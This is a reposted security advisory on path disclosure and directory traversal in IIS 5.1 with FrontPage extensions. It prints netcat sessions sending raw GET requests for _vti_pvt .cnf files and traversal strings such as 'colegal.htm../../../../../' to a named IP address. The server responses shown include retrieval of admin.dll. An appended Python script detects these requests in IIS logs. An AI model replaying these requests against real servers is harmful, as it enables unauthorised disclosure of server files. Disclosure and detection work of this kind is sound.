COMMAND

IIS path & directory traversal issues

SYSTEMS AFFECTED

Windows XP with IIS 5.1

PROBLEM

In NtWaK0 [http://www.SafeHack.com] advisory:

Identify WEB DIR installation. By sending this "GET /_vti_pvt/access.cnf" you can identify the web installation. As we all know this is a helpful piece of information if someone is going to attack your web site. Multiple .cnf files are at cause.

Exploits:
========

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/access.cnf

vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

There is another security issue with this too. "InheritPermissions:false" will tell the security inheritance of that folder.

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/botinfs.cnf

vti_encoding:SR|utf8-nl
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/bots.cnf

vti_encoding:SR|utf8-nl
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\fp4Avnb.dll

-Also-

Using GET /iishelp/common/colegal.htm you can access other files under the web structure. I did not have a chance to test it on files above the web structure. Like I said, I do not run IIS 5.1 but a friend does. One of these days I am going to buy more memory for some of my old box and

Exploits:
========

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm../../../../../_vti_pvt/access.cnf

vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

writeto.cnf

[Extracted From] http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp

Back links for files that can be written to by users of the web, such as Save Results Form handler result files. Files that can be written to by users of the web have a looser security setting than regular web content.

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm../../../../../_vti_bin/_vti_adm/admin.dll

(binary response removed: the server returns the admin.dll executable itself, starting with the MZ header and the "This program cannot be run in DOS mode" stub)

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/linkinfo.cnf

vti_encoding:SR|utf8-nl
javascript\:loadhelpfront();  localstart.asp
javascript\:activate(<%=iver%>);  localstart.asp
http\://www.safehack.com  index.htm
/iishelp/common/colegal.htm  localstart.asp

SOLUTION

None yet.
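As an added defensive example (not part of the NtWaK0 advisory), the following Python scan walks IIS W3C extended log lines and flags the two request shapes shown above: direct reads of FrontPage _vti_pvt/*.cnf files or _vti_adm/admin.dll, and a file name immediately followed by ../ (the colegal.htm traversal). The log lines are constructed, and the field layout and the assumption that IIS logs the stem before traversal is resolved are mine.

```python
import re
from urllib.parse import unquote

# Constructed sample IIS 5.1 W3C log (not captured from a real server).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.1
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-03-01 10:00:01 192.0.2.10 GET /default.htm - 200
2002-03-01 10:00:02 192.0.2.10 GET /_vti_pvt/access.cnf - 200
2002-03-01 10:00:03 192.0.2.10 GET /iishelp/common/colegal.htm../../../../../_vti_pvt/access.cnf - 200
2002-03-01 10:00:04 192.0.2.10 GET /iishelp/common/colegal.htm%2e%2e/%2e%2e/_vti_bin/_vti_adm/admin.dll - 200
2002-03-01 10:00:05 192.0.2.11 GET /_vti_pvt/bots.cnf - 404
2002-03-01 10:00:06 192.0.2.12 GET /iishelp/common/colegal.htm - 200
"""

# FrontPage configuration files and the admin DLL read in the advisory.
SENSITIVE = re.compile(r"/_vti_pvt/[^/]+\.cnf$|/_vti_bin/_vti_adm/admin\.dll$", re.I)
# A file extension directly followed by "../", e.g. "colegal.htm../".
TRAVERSAL = re.compile(r"\.[a-z0-9]+\.\./", re.I)


def parse_iis_log(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def classify(stem):
    """Return the reasons a URI stem looks like a .cnf read or traversal."""
    decoded = unquote(stem)  # %2e%2e becomes .. before matching
    reasons = []
    if TRAVERSAL.search(decoded):
        reasons.append("traversal")
    if SENSITIVE.search(decoded):
        reasons.append("cnf")
    return reasons


def find_exposure(text):
    """List suspicious requests; 'served' is True when the server answered 200."""
    hits = []
    for rec in parse_iis_log(text):
        reasons = classify(rec["cs-uri-stem"])
        if reasons:
            hits.append({"ip": rec["c-ip"], "uri": rec["cs-uri-stem"],
                         "status": int(rec["sc-status"]), "reasons": reasons,
                         "served": rec["sc-status"] == "200"})
    return hits
```

A served hit means the file left the server and the web root path in PasswordDir should be treated as disclosed; a 404 shows the probe without the exposure.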